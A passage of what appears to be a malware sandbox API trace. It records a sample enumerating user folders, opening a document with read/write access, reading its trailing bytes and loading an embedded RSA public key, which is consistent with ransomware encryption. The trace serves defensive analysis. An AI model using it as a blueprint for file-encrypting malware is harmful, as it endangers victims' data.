dwReserved1=0x0, cFileName="_5Scyv3UUtL1Q1i1w_tJ.avi", cAlternateFileName="_5SCYV~1.AVI")) returned 0 [0237.186] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0237.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0237.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4dd8 | out: hHeap=0x620000) returned 1 [0237.186] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0237.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c50f0 | out: hHeap=0x620000) returned 1 [0237.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7c9d0 | out: hHeap=0x620000) returned 1 [0237.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c51a0 | out: hHeap=0x620000) returned 1 [0237.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c51f8 | out: hHeap=0x620000) returned 1 [0237.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4b70 | out: hHeap=0x620000) returned 1 [0237.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7cc40 | out: hHeap=0x620000) returned 1 [0237.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7cca8 | out: hHeap=0x620000) returned 1 [0237.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7cd10 | out: hHeap=0x620000) returned 1 [0237.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4d28 | out: hHeap=0x620000) returned 1 [0237.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7cd78 | out: hHeap=0x620000) returned 1 [0237.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5040 | out: hHeap=0x620000) returned 1 [0237.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7cde0 | out: hHeap=0x620000) returned 1 [0237.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4fe8 | out: hHeap=0x620000) returned 1 [0237.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4f90 | out: hHeap=0x620000) returned 1 [0237.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ce48 | out: hHeap=0x620000) returned 1 [0237.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4f38 | out: hHeap=0x620000) returned 1 [0237.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ceb0 | out: hHeap=0x620000) returned 1 [0237.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4ee0 | out: hHeap=0x620000) returned 1 [0237.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4ac0 | out: hHeap=0x620000) returned 1 [0237.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7caa0 | out: hHeap=0x620000) returned 1 [0237.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0237.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7caa0 [0237.187] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0237.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0237.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7caa0 | out: hHeap=0x620000) returned 1 [0237.189] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0237.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7caa0 [0237.189] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0237.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0237.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0237.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.191] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.191] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0237.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c5148 [0237.191] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0237.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3408e10 [0237.191] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0237.191] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.192] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.192] PathFindFileNameW (pszPath="") returned="" [0237.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0237.192] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0237.192] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0237.192] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0237.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0237.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c44b0 [0237.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0237.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.192] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0237.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a660 [0237.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0237.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x38) returned 0x33f0408 [0237.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0237.193] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0237.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c44b0 [0237.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x54) returned 0x33ecb68 [0237.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3b8f838 [0237.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a660 [0237.193] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 0 [0237.193] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0237.193] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0237.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7caa0 [0237.193] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0237.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0237.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.193] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0237.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0237.193] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0237.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0237.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.194] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gDzXHkl4U_l2Ylj0rT\\") returned="gDzXHkl4U_l2Ylj0rT\\" [0237.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0237.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c5148 [0237.194] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0237.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3408e10 [0237.194] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.194] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.194] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.194] PathFindFileNameW (pszPath="") returned="" [0237.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0237.194] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gDzXHkl4U_l2Ylj0rT\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85ec24b0, ftCreationTime.dwHighDateTime=0x1d5c29c, ftLastAccessTime.dwLowDateTime=0x7c4871e0, ftLastAccessTime.dwHighDateTime=0x1d5c3e4, ftLastWriteTime.dwLowDateTime=0x7c4871e0, ftLastWriteTime.dwHighDateTime=0x1d5c3e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0237.195] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85ec24b0, ftCreationTime.dwHighDateTime=0x1d5c29c, ftLastAccessTime.dwLowDateTime=0x7c4871e0, ftLastAccessTime.dwHighDateTime=0x1d5c3e4, ftLastWriteTime.dwLowDateTime=0x7c4871e0, ftLastWriteTime.dwHighDateTime=0x1d5c3e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0237.195] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd78aad10, ftCreationTime.dwHighDateTime=0x1d5b5b7, ftLastAccessTime.dwLowDateTime=0x8162a0a0, ftLastAccessTime.dwHighDateTime=0x1d5c1ba, ftLastWriteTime.dwLowDateTime=0x8162a0a0, ftLastWriteTime.dwHighDateTime=0x1d5c1ba, nFileSizeHigh=0x0, nFileSizeLow=0xf4c2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="32f7bhkCAEoSWPD2.rtf", cAlternateFileName="32F7BH~1.RTF")) returned 1 [0237.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0237.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x33a87c0 [0237.196] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gDzXHkl4U_l2Ylj0rT\\32f7bhkCAEoSWPD2.rtf") returned=".rtf" [0237.196] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gDzXHkl4U_l2Ylj0rT\\32f7bhkCAEoSWPD2.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gdzxhkl4u_l2ylj0rt\\32f7bhkcaeoswpd2.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.197] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=62658) returned 1 [0237.197] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.200] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xf49c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.200] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.202] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xf4c2, lpOverlapped=0x0) returned 1 [0237.203] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0237.203] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.203] lstrlenA (lpString="-----BEGIN PUBLIC 